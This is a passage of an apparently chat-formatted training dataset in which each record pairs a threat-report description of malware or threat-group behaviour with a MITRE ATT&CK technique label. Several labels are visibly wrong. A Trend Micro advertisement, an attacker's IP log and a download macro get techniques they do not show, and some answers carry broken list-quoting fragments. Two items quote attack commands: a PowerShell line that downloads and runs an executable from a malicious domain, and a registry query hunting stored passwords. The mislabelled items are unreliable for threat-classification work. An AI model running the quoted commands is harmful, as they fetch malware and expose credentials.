{ "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has hidden its GUI using the ShowWindow() WINAPI call." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMould has the ability to find files on the targeted system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used various JavaScript-based backdoors." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can enumerate active services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper can search for anti-virus software running on the system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner has used base64 encoding to obfuscate scripts on the system." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot can use VNC for remote access to targeted systems." }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has used `rundll32.exe` for execution." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the victim LAN IP address and sends it to the C2 server." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "the filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections." }, { "role": "assistant", "content": "T1587.001 - Malware', 'T1546.001 - Event Triggered Execution: Change Default File Association" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 communications begins with a beacon to the following URL: hxxp://www.windowspatch[.]com/khc? If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1571 - Non-Standard Port', 'T1008 - Fallback Channels', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has injected its DLL component into `EhStorAurhn.exe`." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers and beacons the system time during installation." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used to locate PDF, Excel, and Word documents during. The group also searched a compromised DCCC computer for specific terms." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor has collected the MAC address of a compromised host; it can also use \"GetAdaptersInfo\" to identify network adapters." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flame identifies security software such as antivirus through the Security module." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These variants include system information collection (operating system, computer name), keylogger output, and browser password collection from Internet Explorer, Chrome and Firefox" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos can access a system’s webcam and take pictures." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldFinder has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum has used a custom implementation of AES encryption to encrypt collected data." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "xCaon has decoded strings from the C2 server before executing commands." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Registry key “Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\” is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer" }, { "role": "assistant", "content": "T1090 - Proxy', 'T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CORESHELL can communicate over SMTP and POP3 for C2." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has used HTTPS over port 443 for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mongall has the ability to decrypt its payload prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti ransomware can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and check to ensure IP addresses it connects to are for local, non-internet systems." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before writing a keystroke to the log, the malware obtains the current locale identifier using the ‘GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, Reaver.v2 will execute the ‘~Update.lnk’ file in a new process, thus loading the recently dropped malicious CPL file" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can use multiple Native APIs." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (Exfiltration Over C2 Channel [T1041" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can switch to a new C2 channel if the current one is broken." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM can continuously capture keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been observed leveraging a module that can scrape email addresses from Outlook." }, { "role": "assistant", "content": "T1087.003 - Email Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used Mimikatz's DCSync to dump credentials from the memory of the targeted system." }, { "role": "assistant", "content": "T1003.006 - OS Credential Dumping: DCSync" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can query service configuration information." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has executed the \"ver\" command." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A payload has searched all fixed drives on the victim for files matching a specified list of extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire uses a command-line interface to interact with systems." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used the service control manager on a remote system to disable services associated with security monitoring products." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTPS, HTTP, and DNS for C2 communications." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants use ports 8080 and 8000 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malicious Document Decoy Document The attack starts with a spear-phishing email containing the HWP document named \"미북 정상회담 전망 및 대비.hwp\" (Prospects for US-North Korea Summit .hwp)" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can enumerate directories on a compromise host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can collect the username from a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBferry can execute rundll32.exe in memory to avoid detection." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "pngdowner uses HTTP for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "reg query HKCU /f password /t REG_SZ /s" }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple can use HTTP GET to request and pull information from C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SynAck parses the export tables of system DLLs to locate and call various Windows API functions." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used the command \"query user\" on victim hosts." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro downloads a payload from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.exe (SHA256: 84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line process:cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel[.]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exeThe macro then attempts to kill Microsoft Office and Windows Defender processes using the ‘taskkill’ command" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing', 'T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"Shell\" subkey to the previously created string. Ultimately, the following registry key is created for persistence" }, { "role": "assistant", "content": "T1547.014 - Active Setup', 'T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AT&T Alien Labs™ has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind saves information from its keylogging routine as a .zip file in the present working directory." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used compromised service principals to make changes to the Office 365 environment." }, { "role": "assistant", "content": "T1550.001 - Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan can identify users registered to a targeted machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has the ability to enumerate file and folder names." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device’s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant’s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device" }, { "role": "assistant", "content": "T1559 - Inter-Process Communication', 'T1078.001 - Valid Accounts: Default Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel has relied on a user to execute a malicious attachment delivered via spearphishing." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware gathers the registered user and primary owner name via WMI." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "China Chopper's server component can change the timestamp of files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It then takes note of the infected machine’s IP address, user, domain, hostname, OS and Service Pack, and the username and password combination that worked during the brute force routine" }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elise enumerates processes via the \"tasklist\" command." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fake domains . Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. The attackers then used this fake website, which they hosted on a domain that was nearly identical to its legitimate counterpart, to distribute ObliqueRAT. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Malicious file-sharing domains . Transparent Tribe also regularly registers domains that appear to be legitimate file- and media-sharing services. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Conference attendees . Transparent Tribe also finds attendees of specific conferences to target. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites" }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT modified its security token to grants itself debugging privileges by adding \"SeDebugPrivilege\"." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used RAR to compress collected data before." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack 